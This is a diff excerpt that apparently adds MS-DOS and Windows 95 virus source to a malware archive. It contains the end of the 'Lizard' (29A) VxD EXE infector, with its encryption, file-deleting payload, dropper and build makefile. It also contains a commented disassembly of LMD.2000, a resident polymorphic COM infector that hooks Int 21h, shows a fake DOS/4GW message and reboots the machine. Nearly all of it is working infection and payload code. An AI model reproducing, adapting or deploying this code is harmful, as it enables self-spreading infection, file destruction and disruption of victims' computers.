vxddata +mov cx,vxddsize +lea edx,vxddata +vxdint 21h + +mov ax,4201h ;jmp over realmodecode and zeros +xor cx,cx +mov dx,2037 +vxdint 21h + +mov ah,3fh ;store the vxdcode +mov cx,vxdcsize +lea edx,vxdcode +vxdint 21h + +mov ah,3eh ;close... +vxdint 21h + +mov dflag,1 ;set flag +;----------------------------------------------------------------------------- +done: +mov ah,1ah ;set dta +lea edx,ndta +vxdint 21h + +ffirst: +mov ah,4eh ;search for first exe +jmp short w +fnext: +mov ah,4fh ;find next exe +w: +mov cx,7 +lea edx,wcard ;*.e?e +vxdint 21h +jc ecsit + +mov ax,4301h ;set normal attribute +mov cx,20h +lea edx,[ndta + 30] +vxdint 21h + +cmp pflag,1 ;sux0ring microsuckers +jne pheeew ;(the payload in v1.0 was a bit too destructive ;) + +evil: +;evil payload against the imperialism of microsoft! +mov ah,41h ;yhcrana +lea edx,[ndta + 30] +vxdint 21h +jmp ecsit + +pheeew: +mov ax,3d02h ;open the victim +lea edx,[ndta + 30] +vxdint 21h +jc fnext +xchg ax,bx + +mov ah,3fh ;read header +mov cx,26 +lea edx,header +vxdint 21h + +cmp word ptr [header],'ZM' ;exe? +jne cfile +cmp word ptr [header + 0ch],0ffffh ;allocate all mem? +jne cfile +cmp word ptr [header + 18h],40h ;win exe? +je cfile +mov al,[header + 12h] ;infected? +or al,al +jne cfile + +;save ss:sp +mov ax,word ptr [header + 0eh] +mov sseg,ax +mov ax,word ptr [header + 10h] +mov ssp,ax + +;save cs:ip +mov eax,dword ptr [header + 14h] +mov csip,eax + +mov ax,4202h ;eof +xor cx,cx +cwd +vxdint 21h + +;calc new cs:ip +mov cx,16 +div cx +sub ax,word ptr [header + 8] + +mov word ptr [header + 14h],dx +mov word ptr [header + 16h],ax + +add edx,vend ;calc stack + +mov word ptr [header + 0eh],ax +mov word ptr [header + 10h],dx + +;xor encryption +rdnm: +in al,40h +or al,al +je rdnm +mov [encval],al ;save random value + +mov edi,offset32 encstart +mov cx,esize +xl: +xor [edi],al +inc edi +loop xl + +;write virus +mov ah,40h +mov cx,vsize +mov edx,offset32 start +vxdint 21h + +;undo +mov al,[encval] +mov edi,offset32 encstart +mov cx,esize + +xll: +xor [edi],al +inc edi +loop xll + +mov ax,4202h ;eof +xor cx,cx +cwd +vxdint 21h + +mov cx,512 ;calc pages +div cx +or dx,dx +jz short np +inc ax +np: +mov word ptr [header + 4],ax +mov word ptr [header + 2],dx + +mov ax,4200h ;bof +xor cx,cx +cwd +vxdint 21h + +rnd: +in al,40h ;set infection flag +or al,al +je rnd +mov [header + 12h],al + +mov ah,40h ;write new header +mov cx,26 +lea edx,header +vxdint 21h + +cfile: +mov cl,byte ptr [ndta + 21] ;restore attribute +lea edx,[ndta + 1eh] +mov ax,4301h +vxdint 21h + +mov cx,word ptr [ndta + 22] ;restore time/date +mov dx,word ptr [ndta + 24] +mov ax,5701 +vxdint 21h + +mov ah,3eh ;close file +vxdint 21h +jmp fnext + +ecsit: +VMMcall End_Nest_Exec +Pop_Client_State + +prevhook: +stc +ret +EndProc int21h +;----------------------------------------------------------------------------- +BeginProc LZD_Control +Control_Dispatch Init_Complete,LZD_Device_Init +clc +ret +EndProc LZD_Control +wb db 13,10,'Lizard by Reptile/29A',0 +VxD_Locked_Code_Ends +End ;this is the end my only friend the end... + +;---[RMLZD.ASM]--------------------------------------------------------------- + +;Lizard's real mode portion + +.286 + +vxdhsize equ 701 +vxddsize equ 81 +vxdcsize equ 880 +esize equ encend - encstart +rmsize equ rmend - rmstart + +.model tiny + +.code +org 100h +start: +rmstart: +;get delta +;----------------------------------------------------------------------------- +call $ + 3 +drazil: +pop si +sub si,offset drazil +push si +pop bp +;----------------------------------------------------------------------------- +push ds ;coz psp + +push cs +pop ds + +;decrypt it +db 176 ;mov al +encval db 0 +;----------------------------------------------------------------------------- +lea di,[bp + offset encstart] +mov cx,esize +xd: +jmp fj +fj2: +inc di +loop xd +jmp encstart +fj: +xor [di],al +jmp fj2 +;----------------------------------------------------------------------------- +encstart: +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname1] ;c:\windows\system\iosubsys +int 21h +jnc cfile ;exit if already installed +mov ah,3ch ;install lzd.vxd +xor cx,cx +int 21h +jnc inst + +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname2] ;c:\win95\system\iosubsys +int 21h +jnc cfile +mov ah,3ch +xor cx,cx +int 21h +jnc inst + +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname3] ;c:\windows.000\system\iosubsys +int 21h +jnc cfile +mov ah,3ch +xor cx,cx +int 21h +jc exit + +inst: +xchg ax,bx + +mov ah,40h ;write the header +mov cx,vxdhsize +lea dx,[bp + offset vxdheader] +int 21h + +;write some zeros +mov cx,3400 +lzero: +push cx +mov ah,40h +mov cx,1 +lea dx,[bp + zero] +int 21h +pop cx +loop lzero + +mov ah,40h ;write the data +mov cx,vxddsize +lea dx,[bp + offset vxddata] +int 21h + +mov ah,40h ;write the rmcode +mov cx,rmsize +lea dx,[bp + offset rmstart] +int 21h + +;write some more zeros +mov cx,1732 +lzero2: +push cx +mov ah,40h +mov cx,1 +lea dx,[bp + zero] +int 21h +pop cx +loop lzero2 + +mov ah,40h ;write the code +mov cx,vxdcsize +lea dx,[bp + offset vxdcode] +int 21h + +cfile: +mov ah,3eh +int 21h + +;exe return +exit: +pop ax ;psp +add ax,11h +dec ax +add word ptr [bp + offset csip + 2],ax + +;stack +db 5 ;add ax +sseg dw 0fff0h ;test +mov ss,ax + +db 0bch ;mov sp +ssp dw 0fffeh + +db 0eah +csip dd 0fff00000h + +zero db 0 + +dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0 +dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0 +dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0 +rmend: +vxdheader db vxdhsize dup (?) +vxddata db vxddsize dup (?) +vxdcode db vxdcsize dup (?) +encend: +ends +end start + +;---[RMLZD.INC]--------------------------------------------------------------- + +;Modified db listing of rmlzd.com + +start: +db 0E8h, 000h, 000h, 05Eh, 081h, 0EEh, 003h, 001h +db 056h, 05Dh, 01Eh, 00Eh, 01Fh, 0B0h +;db 000h +encval db 0 +db 08Dh +db 0BEh, 021h, 001h, 0B9h, 08Eh, 007h, 0EBh, 005h +db 047h, 0E2h, 0FBh, 0EBh, 004h, 030h, 005h, 0EBh +db 0F7h +encstart: +db 0B8h, 000h, 03Dh, 08Dh, 096h, 0C6h, 001h +db 0CDh, 021h, 073h, 07Fh, 0B4h, 03Ch, 033h, 0C9h +db 0CDh, 021h, 073h, 026h, 0B8h, 000h, 03Dh, 08Dh +db 096h, 0E9h, 001h, 0CDh, 021h, 073h, 06Ch, 0B4h +db 03Ch, 033h, 0C9h, 0CDh, 021h, 073h, 013h, 0B8h +db 000h, 03Dh, 08Dh, 096h, 00Ah, 002h, 0CDh, 021h +db 073h, 059h, 0B4h, 03Ch, 033h, 0C9h, 0CDh, 021h +db 072h, 055h, 093h, 0B4h, 040h, 0B9h, 0BDh, 002h +db 08Dh, 096h, 031h, 002h, 0CDh, 021h, 0B9h, 048h +db 00Dh, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh +db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h +db 0B4h, 040h, 0B9h, 051h, 000h, 08Dh, 096h, 0EEh +db 004h, 0CDh, 021h, 0B4h, 040h, 0B9h, 031h, 001h +db 08Dh, 096h, 000h, 001h, 0CDh, 021h, 0B9h, 0C4h +db 006h, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh +db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h +db 0B4h, 040h, 0B9h, 070h, 003h, 08Dh, 096h, 03Fh +db 005h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 058h +db 005h, 011h, 000h, 048h, 001h, 086h, 0C3h, 001h +db005h +;db 0F0h, 0FFh +sseg dw 0fff0h ;not necessary +db 08Eh, 0D0h, 0BCh +;db 0FEh, 0FFh +ssp dw 0fffeh +db0EAh +;db 000h, 000h, 0F0h, 0FFh +csip dd 0fff00000h +db 000h +;db 063h, 03Ah +;db05Ch, 077h, 069h, 06Eh, 064h, 06Fh, 077h, 073h +;db05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh, 05Ch +;db069h, 06Fh, 073h, 075h, 062h, 073h, 079h, 073h +;db05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h, 064h +;db000h, 063h, 03Ah, 05Ch, 077h, 069h, 06Eh, 039h +;db035h, 05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh +;db05Ch, 069h, 06Fh, 073h, 075h, 062h, 073h, 079h +;db 073h, 05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h +;db 064h, 000h, 063h, 03Ah, 05Ch, 077h, 069h, 06Eh +;db 064h, 06Fh, 077h, 073h, 02Eh, 030h, 030h, 030h +;db 05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh, 05Ch +;db069h, 06Fh, 073h, 075h, 062h, 073h, 079h, 073h +;db05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h, 064h +;db000h +dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0 +dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0 +dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0 +vxdheader db vxdhsize dup (?) +vxddata db vxddsize dup (?) +vxdcode db vxdcsize dup (?) +encend: +vend: + +;---[LZD.DEF]----------------------------------------------------------------- + +VXD LZD DYNAMIC +DESCRIPTION '' +SEGMENTS + _LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE + _TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE + CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE + _TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE + _BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE + _ITEXT CLASS 'ICODE' DISCARDABLE + _IDATA CLASS 'ICODE' DISCARDABLE + _PTEXT CLASS 'PCODE' NONDISCARDABLE + _PDATA CLASS 'PDATA' NONDISCARDABLE SHARED + _STEXT CLASS 'SCODE' RESIDENT + _SDATA CLASS 'SCODE' RESIDENT + _DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE + _RCODE CLASS 'RCODE' + +EXPORTS + LZD_DDB @1 + +;---[MAKEFILE]---------------------------------------------------------------- + +NAME = lzd + +LINK = LINK + +ASM = ml +AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -c -Cx -Zm -DMASM6 -DDEBLEVEL=0 +ASMENV = ML +LFLAGS = /VXD /NOD + +.asm.obj: + set $(ASMENV)=$(AFLAGS) + $(ASM) -Fo$*.obj $< + +all : $(NAME).VXD + +OBJS = lzd.obj + +lzd.obj: lzd.asm + +$(NAME).VxD: $(NAME).def $(OBJS) + link @<<$(NAME).lnk +$(LFLAGS) +/OUT:$(NAME).VxD +/MAP:$(NAME).map +/DEF:$(NAME).def +$(OBJS) +<< + + @del *.exp>nul + @del *.lib>nul + @del *.map>nul + @del *.obj>nul +;... \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm b/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm new file mode 100644 index 00000000..53e0ddde --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm @@ -0,0 +1,587 @@ +; LMD.2000 + +; Resident Polymorphic COM Infector +; Virus Reroutes Int 21h Handler through Int 84h and uses Int 84h for +; virus function calls. Int 21h Function 4Bh (Set Execution State) is hooked +; for infection routine. Virus prepends its body to files and writes 2000 +; original bytes to end of file. Polymorphic routine makes 128 random +; one byte instructions and then fills in crypt information. + +; Cleaning Instructions - Overwrite First 2000 Bytes with Last 2000 Bytes +; Detection - No scanners detect this beastie yet. + +; Research and Disassembly by PakiLad 05/03/97 + +p386n + + +seg000 segment byte public 'CODE' use16 + assume cs:seg000 + org 100h + assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing + +start: + db 128 dup (90h) ; Buffer For Cryptor +CryptedCode: + jmp VirusStart +OneByteTable db 26h ; SEGES + db 27h ; DAA + db 2Eh ; SEGCS + db 2Fh ; DAS + db 0FBh ; STI + db 37h ; AAA + db 3Eh ; SEGDS + db 3Fh ; AAS + db 40h ; INC AX + db 42h ; INC DX + db 46h ; INC SI + db 48h ; DEC AX + db 4Ah ; DEC DX + db 4Eh ; DEC SI + db 90h ; NOP + db 92h ; XCHG AX, DX +InfMarker db 'LMD' + +GetRand15 proc near + push cx + in ax, 40h ; Get Random Number + xchg ax, cx + +MakeRandLoop: + xor ax, cx + loop MakeRandLoop + xchg ax, cx + in ax, 40h ; Get Random Number + inc cx + xor ax, cx + and ax, 0Fh ; Number 0 - 15 + pop cx + retn +GetRand15 endp + +GetOneByteIns proc near + push di + mov di, offset OneByteTable + call GetRand15 + add di, ax + mov al, cs:[di] + pop di + retn +GetOneByteIns endp + +CopyOverVir proc near + push bx + push es + push ds + nop + push cs + pop es ; ES = CS + assume es:seg000 + mov di, offset Buffer+10h + mov si, offset start + 10h + mov cx, 2000 + rep movsb + push ds + pop ax + add ax, 126 + mov [RestoreSeg + 10h], ax + mov al, [LastByte + 10h] + push ax + push cs + mov ax, offset StoreLastByte + 10h + push ax + mov [LastByte + 10h], 0CBh + jmp near ptr JMPFarProg +CopyOverVir endp + + +StoreLastByte: + pop ax + pop ds + mov [LastByte + 10h], al + pop es + assume es:nothing + pop bx + retn + +CheckGeneration proc near + in al, 40h ; Get Random Number + cmp al, 240 ; Below 240? + jb RandBelow240 ; Yes? Then JMP. + call GenerateCryptor + call GenerateCryptor + push dx + db 8Dh, 16h, 88h, 02h ; (FIXUP) LEA DX, OFFSET FAKE4DOSGW + mov ah, 9 + int 21h ; Write Fake Message + pop dx + +RandBelow240: + retn +CheckGeneration endp + + +SetupInt84 proc near + push es + push bx + push di + xor ax, ax + mov di, 211h ; Offset of INT 84h + push ds + mov ds, ax ; DS points to IVT + assume ds:nothing + cmp word ptr [di], 0 ; Is Virus Installed? + jnz AlreadyInMem ; Yes? Then JMP. + mov ax, 3521h + int 21h ; Get Int 21h Vectors + dec di + mov ax, es + mov [di], bx ; Set New Int 84h Offset + inc di + inc di + mov [di], ax ; Set New Int 84h Segment + cmp ax, ax + +AlreadyInMem: + pop ds + assume ds:seg000 + pop di + pop bx + pop es + retn +SetupInt84 endp + +InstallVirus proc near + push si + push di + push bx + mov ax, 5803h + xor bx, bx + int 21h ; Get UMB Link Status + push es + push dx + mov ax, 3521h + int 21h ; Get Int 21h Vectors + mov ax, es + mov cs:Int21Ofs, bx + mov cs:Int21Seg, ax + push ds + push ds + pop ax + dec ax + mov ds, ax ; DS points to MCB + assume ds:nothing + sub word ptr ds:3, 272 ; Subtract 4352 Bytes + sub word ptr ds:12h, 272 ; Subtract 4352 Bytes From Next Seg + mov es, ds:12h ; ES points to Next Segment + xor di, di + xor si, si + mov cx, 2272 + rep movsb ; Copy Virus Into Memory + xor ax, ax + mov ds, ax ; DS points to IVT + assume ds:nothing + sub word ptr ds:413h, 5 ; Subtract 5k From System Memory + mov word ptr es:1, 0 ; Set New PSP Segment + mov word ptr es:3, 272 ; Allocate 4352 Bytes + push es + pop ds ; DS = ES + assume ds:seg000 + mov ax, 2521h + mov dx, offset NewInt21 + 10h + int 21h ; Set New Int 21h Vectors + pop ds + pop dx + pop es + pop bx + pop di + pop si + retn +InstallVirus endp + +FakeDOS4GW db 0Ah + db 'DOS/4GW Protected Mode Run-time Version 1.95',0Dh,0Ah + db 'Copyright (c) Rational Systems, Inc. 1990-1993',0Dh,0Ah + db 0Dh,0Ah,'$' +JMPFarProg db 0EAh +RestoreOfs dw 100h +RestoreSeg dw 0 + +RestoreRoutine: + rep movsb + pop di + pop si + pop cx + jmp short $+2 +FileSize dw 0 + +NewInt24: + mov al, 3 + iret + db 37h + +VirusStart: + call CheckGeneration + in al, 40h ; Get Random Number + cmp al, 16 ; Above 16? + ja NoPayload ; Yes? Then JMP. + mov ax, 11h + int 10h ; Set Video Mode 80x13 + mov ax, 0A000h + mov es, ax ; ES points to Video Memory + assume es:nothing + mov di, 3222h + mov si, offset Graphic + mov cx, 80 + +DisplayGraphic: + push cx + mov cx, 80 + +DisplayLine: + cmp cx, 69 + jb Below69 + mov al, [si] + inc si + mov es:[di], al + +Below69: + inc di + loop DisplayLine + pop cx + loop DisplayGraphic + mov ah, 9 + mov dx, offset LozMustDie + int 21h ; Write String + xor ax, ax + int 16h ; Wait For KeyPress + jmp near ptr Reboot +LozMustDie db 9,9,0Ah + db 9,0Ah + db 0Ah + db 0Ah + db 7,' Lozinsky MuST DiE!$' + +NoPayload: + xor ax, ax + call GenerateCryptor + call SetupInt84 + jnz RestoreProg + call InstallVirus + +RestoreProg: + mov si, offset start + mov di, 0FFFEh + xor dx, dx + push cx + push si + push di + push cs + pop es + assume es:seg000 + mov si, offset RestoreRoutine + mov di, 0F9h + mov cx, 7 + rep movsb ; Copy Restore Routine + mov si, [si] + mov di, offset start + add si, di + mov cx, 2000 + db 0E9h,069h,0FDh ; JMP To Restore Routine + +NewInt21: + cmp ax, 4B00h ; Set Execution State? + jz InfectFile ; Yes? Then JMP. +JMPFar21 db 0EAh +Int21Ofs dw 0 +Int21Seg dw 0 + +InfectFile: + pushf + push ax + push bx + push cx + push es + push si + push di + push dx + push ds + push cs + pop ds + mov dx, offset NewInt24 + 10h + mov ax, 2524h + int 84h ; Set New Int 24h + pop ds + pop dx + push dx + push ds + mov ax, 4300h + push ax + int 84h ; Get File Attributes + pop ax + inc ax + push ax + push cx + and cl, 0D8h + int 84h ; Clear File Attributes + jb FileProblems ; Problems? Then JMP. + mov ax, 3D02h + int 84h ; Open File + xchg ax, bx + mov ax, 5700h + int 84h ; Get File Date/Time + push cx + push dx + push cs + pop ds ; DS = CS + mov cx, 128 + mov dx, offset Buffer+10h + mov ah, 3Fh + int 84h ; Read In 128 Bytes + cmp cx, ax ; Read 128 ? + jnz RestoreTD ; No? Then JMP. + mov al, [Buffer+10h] + cmp al, 'M' ; EXE File? + jz RestoreTD ; Yes? Then JMP. + cmp al, 'Z' ; EXE File? + jz RestoreTD ; Yes? Then JMP. + call CheckForMark + jz RestoreTD ; Infected Already? Then JMP. + call DoInfect + call NotBigEnough + +RestoreTD: + pop dx + pop cx + mov ax, 5701h + int 84h ; Restore File Date/Time + mov ah, 3Eh + int 84h ; Close File + +FileProblems: + pop cx + pop ax + int 84h ; Restore File Attributes + pop ds + pop dx + pop di + pop si + pop es + assume es:nothing + pop cx + pop bx + pop ax + popf + jmp short near ptr JMPFar21 + +CheckForMark proc near + push di + push si + mov di, offset InfMarker + mov cx, 16 + +FindMark: + mov al, [di] + push cx + mov si, offset Buffer+10h + mov cx, 128 + +CheckForMarker: + mov ah, [si] + cmp al, ah + jz FoundMark + inc si + loop CheckForMarker + cmp ax, cx + pop cx + jmp short DoneWithMark + +FoundMark: + pop cx + inc di + loop FindMark + cmp ax, ax + +DoneWithMark: + pop si + pop di +CheckForMark endp + +NotBigEnough proc near + retn +NotBigEnough endp + +DoInfect proc near + mov cx, 1872 + mov dx, offset OrgProgram+10h + mov ah, 3Fh + int 84h ; Read In 1872 Bytes + cmp ax, cx ; Read 1872? + jnz NotBigEnough ; No? Then JMP. + xor cx, cx + xor dx, dx + mov ax, 4202h + int 84h ; Move Pointer to End of File + jb NotBigEnough + cmp dx, 0 ; Over 64k? + jnz NotBigEnough ; Yes? Then JMP. + cmp ax, 2048 ; Under 2048 Bytes? + jb NotBigEnough ; Yes? Then JMP. + cmp ax, 60000 ; Over 60000 Bytes? + ja NotBigEnough ; Yes? Then JMP. + cmp Buffer+30h, 0 + jz NotBigEnough + mov [FileSize + 10h], ax + mov ah, 40h + mov dx, offset Buffer+10h + mov cx, 2000 + int 84h ; Write Original Bytes To End of File + jb NotBigEnough + call CopyOverVir + xor cx, cx + xor dx, dx + mov ax, 4200h + int 84h ; Move Pointer to Beginning + mov ah, 40h + mov dx, offset Buffer+10h + mov cx, 2000 + int 84h ; Write Virus to File + retn +DoInfect endp + +Graphic db 0, 30h, 0Bh dup(0), 20h, 2 dup(0), 1Ah, 0FBh, 0EBh, 9Fh, 90h, 4 dup(0) + db 20h, 2 dup(0), 47h, 2 dup(25h), 0FDh, 0AAh, 4 dup(0), 0E0h, 0, 7, 0FAh + db 12h, 92h, 22h, 54h, 80h, 3 dup(0), 0C0h, 0Ch, 4, 0, 0A8h, 4Ah, 94h + db 55h, 40h, 3 dup(0), 0C0h, 8, 0Dh, 5Ah, 45h, 2 dup(55h), 0AAh, 0A0h + db 3 dup(0), 0C0h, 0FBh, 0F2h, 4, 95h, 54h, 0AAh, 5Dh, 0A0h, 3 dup(0) + db 0DDh, 80h, 28h, 0A2h, 49h, 2 dup(55h), 2 dup(0AAh), 3 dup(0), 0D7h + db 0Ah, 2, 19h, 25h, 5Dh, 4Ah, 6Dh, 0A4h, 3 dup(0), 0E6h, 0, 0A8h, 84h + db 95h, 7Ah, 0AAh, 56h, 0D0h, 3 dup(0), 0C0h, 48h, 2, 59h, 52h, 8Bh, 55h + db 0BAh, 0AAh, 4 dup(0), 2, 90h, 4, 4Ah, 7Dh, 55h, 6Fh, 64h, 4 dup(0) + db 24h, 25h, 5Ah, 2 dup(0AAh), 0ABh, 0B5h, 0B0h, 4 dup(0), 3 dup(1), 2Ah + db 0D5h, 0AAh, 5Ah, 0AAh, 4 dup(0), 40h, 8, 99h, 55h, 5Ah, 0DAh, 0DBh + db 53h, 4 dup(0), 15h, 52h, 44h, 0AAh, 0ABh, 57h, 0AAh, 0A9h, 80h, 4 dup(0) + db 89h, 22h, 55h, 6Dh, 55h, 5Eh, 0AAh, 0C0h, 2 dup(0), 4, 42h, 24h, 99h + db 56h, 0B5h, 56h, 0EAh, 0D1h, 5 dup(0), 91h, 25h, 5Bh, 2 dup(0AAh), 0D5h + db 4Ah, 40h, 4 dup(0), 8, 81h, 2Ah, 0AAh, 95h, 2Eh, 0E9h, 4 dup(0), 1 + db 45h, 24h, 4, 56h, 0DAh, 0E9h, 54h, 80h, 2 dup(0), 8, 80h, 20h, 0, 21h + db 55h, 56h, 0DDh, 0B6h, 3 dup(0), 2, 8, 0Ah, 2 dup(0), 2Ah, 0BBh, 0AAh + db 0D4h, 80h, 4 dup(0), 40h, 44h, 1, 9, 55h, 56h, 0AAh, 40h, 2 dup(0) + db 8, 5, 1, 0, 80h, 25h, 6Dh, 0BBh, 69h, 3 dup(0), 2, 0, 0Ch, 0A0h, 5 + db 6, 92h, 0C9h, 54h, 4 dup(0), 20h, 26h, 4, 0, 0A0h, 4Ah, 0D4h, 20h, 90h + db 2 dup(0), 4, 1, 19h, 61h, 0, 9, 24h, 6Bh, 55h, 1, 3 dup(0), 40h, 45h + db 4, 10h, 0C4h, 49h, 0A4h, 94h, 2Fh, 3 dup(0), 14h, 2Ah, 59h, 0, 20h + db 0E0h, 4Bh, 68h, 0A5h, 2 dup(0), 2 dup(1), 54h, 0A0h, 1, 48h, 2, 0AAh + db 0B4h, 32h, 3 dup(0), 20h, 0AAh, 5Ah, 90h, 24h, 5, 0B5h, 0A9h, 55h, 3 dup(0) + db 8Ah, 55h, 58h, 44h, 92h, 95h, 0AAh, 0A4h, 22h, 3 dup(0), 1, 6Ah, 26h + db 82h, 4Ch, 6Ah, 16h, 0B4h, 0D4h, 2 dup(0), 1, 55h, 0ADh, 9Ah, 51h, 20h + db 95h, 0EAh, 0AAh, 0B1h, 3 dup(0), 2, 0AAh, 0BDh, 2Ah, 54h, 56h, 2Ah + db 0A9h, 59h, 3 dup(0), 15h, 55h, 42h, 0A9h, 25h, 52h, 0D5h, 55h, 0EAh + db 3 dup(0), 49h, 6Dh, 5Dh, 4Ah, 94h, 0ADh, 2Ah, 49h, 34h, 3 dup(0), 25h + db 56h, 0A4h, 55h, 6Ah, 0D5h, 0A9h, 25h, 0ABh, 3 dup(0), 55h, 75h, 42h + db 0Bh, 0C5h, 2Ah, 0D4h, 92h, 0A0h, 2 dup(0), 1, 13h, 0ADh, 59h, 40h, 22h + db 0D5h, 42h, 0AAh, 47h, 3 dup(0), 4Ah, 0F6h, 0E4h, 2Ah, 95h, 5Ah, 94h + db 95h, 15h, 3 dup(0), 2Bh, 55h, 0BBh, 89h, 55h, 45h, 8Ah, 54h, 0ABh, 3 dup(0) + db 9, 2Ah, 86h, 0A4h, 25h, 55h, 51h, 55h, 17h, 3 dup(0), 2, 0, 3Bh, 2 dup(49h) + db 53h, 0A5h, 55h, 6Ah, 3 dup(0), 40h, 0Ah, 0DDh, 0A5h, 4, 0AAh, 55h, 54h + db 0AAh, 4 dup(0), 41h, 27h, 51h, 69h, 25h, 0CAh, 0A9h, 50h, 3 dup(0) + db 9, 2Ah, 0DAh, 0EAh, 0A4h, 0ABh, 12h, 40h, 5 dup(0), 4Ah, 5Fh, 54h, 52h + db 53h, 55h, 28h, 5 dup(0), 25h, 60h, 0AAh, 0A9h, 49h, 0D4h, 80h, 4 dup(0) + db 4, 0, 26h, 95h, 2Ah, 0AAh, 69h, 48h, 4 dup(0), 1, 41h, 2 dup(0), 0A9h + db 29h, 2 dup(24h), 4 dup(0), 10h, 15h, 2 dup(65h), 54h, 0A4h, 52h, 82h + db 4 dup(0), 2, 0AAh, 0A5h, 90h, 2 dup(0AAh), 29h, 15h, 4 dup(0), 10h + db 5, 5Ah, 6Ah, 0A1h, 25h, 52h, 51h, 0F8h, 3 dup(0), 1, 20h, 45h, 92h + db 54h, 92h, 0C4h, 0ABh, 8Fh, 3 dup(0), 8, 15h, 25h, 55h, 25h, 54h, 0A1h + db 25h, 80h, 3 dup(0), 5, 42h, 0A5h, 6Ah, 0A8h, 12h, 94h, 0A9h, 0C0h, 3 dup(0) + db 5, 55h, 5Ah, 2 dup(0AAh), 0A4h, 4Ah, 0A9h, 0C0h, 3 dup(0), 11h, 55h + db 0A5h, 2 dup(0AAh), 49h, 0AAh, 0A3h, 0E0h, 3 dup(0), 4, 0AAh, 0A6h, 0B5h + db 55h, 23h, 0D5h, 55h, 0E0h, 3 dup(0), 2, 2Dh, 0BAh, 0AAh, 0A2h, 4Ah + db 54h, 0A3h, 0E0h, 3 dup(0), 8, 0A5h, 5Ah, 0A4h, 94h, 25h, 0AAh, 0ABh + db 0E0h, 3 dup(0), 1, 2Ah, 0A5h, 52h, 41h, 56h, 55h, 57h, 0F0h, 4 dup(0) + db 25h, 59h, 24h, 14h, 8Ah, 55h, 57h, 0F0h, 4 dup(0), 40h, 22h, 40h, 82h + db 5Dh, 0AAh, 0AFh, 0F8h, 4 dup(0), 9, 4, 10h, 11h, 6Ah, 55h, 5Fh, 0F8h + db 6 dup(0), 1, 4Ah, 0ADh, 0D5h, 3Fh, 0F8h, 6 dup(0), 4, 0AEh, 0AAh, 2Ah + db 0BFh, 0F8h, 6 dup(0), 15h, 2Ah, 0D5h, 0AAh, 7Fh, 0F8h, 5 dup(0), 20h + db 0A2h, 55h, 2Ah, 54h, 0FFh, 0F8h, 4 dup(0), 3, 0FCh, 49h, 2Ah, 0AAh + db 53h, 0FFh, 0F8h, 4 dup(0), 3, 0FEh, 92h, 91h, 55h, 0A3h, 0FFh, 0F8h + db 4 dup(0), 3, 0FFh, 48h, 4Dh, 4Ah, 4Fh, 0FFh, 0F8h, 4 dup(0), 3, 0FFh + db 0A5h, 25h, 55h, 9Bh, 0DDh, 18h, 4 dup(0), 3, 0FFh, 0D4h, 0AAh, 0A8h + db 7Bh, 0C9h, 68h, 4 dup(0), 3, 0FFh, 0FAh, 44h, 0A5h, 0FBh, 0C1h, 68h + db 4 dup(0), 3, 0FFh, 0FAh, 95h, 53h, 0FBh, 55h, 68h, 4 dup(0), 3, 2 dup(0FFh) + db 52h, 8Fh, 0F8h, 5Dh, 18h, 4 dup(0), 3, 2 dup(0FFh), 0A4h, 5Fh, 2 dup(0FFh) + db 0F8h, 0, 0Bh dup(0FFh) +Reboot db 0EAh ; Reboot Computer + dw 0 + dw 0FFFFh + +GenerateCryptor proc near + push di + push ds + push cs + pop ds + mov di, offset start + mov cx, 128 + push di + +FillWithOneByte: + call GetOneByteIns + mov [di], al + inc di + loop FillWithOneByte + pop di + call GetRand15 + add di, ax + mov byte ptr [di], 0BBh ; Store MOV BX Instruction + add di, 3 + call GetRand15 + add di, ax + mov word ptr [di], 0A8B9h ; Store MOV CX, Instruction + inc di + inc di + mov byte ptr [di], 3 ; Store Decrypt Size + inc di + call GetRand15 + add di, ax + mov word ptr [di], 80BFh ; Store MOV DI + inc di + inc di + mov byte ptr [di], 1 ; Store Offset of Crypted Code + inc di + call GetRand15 + add di, ax + push di + mov word ptr [di], 312Eh ; XOR [DI], + inc di + inc di + mov byte ptr [di], 1Dh ; BX + inc di + call GetRand15 + add di, ax + mov word ptr [di], 4747h ; INC SI/INC SI + inc di + inc di + mov byte ptr [di], 43h ; INC AX + inc di + call GetRand15 + add di, ax + mov byte ptr [di], 0E2h ; LOOP Instruction + pop ax + push di + sub di, ax + mov ax, 0FFFEh + sub ax, di + pop di + inc di + mov [di], al ; Loop Offset + pop ds + pop di + 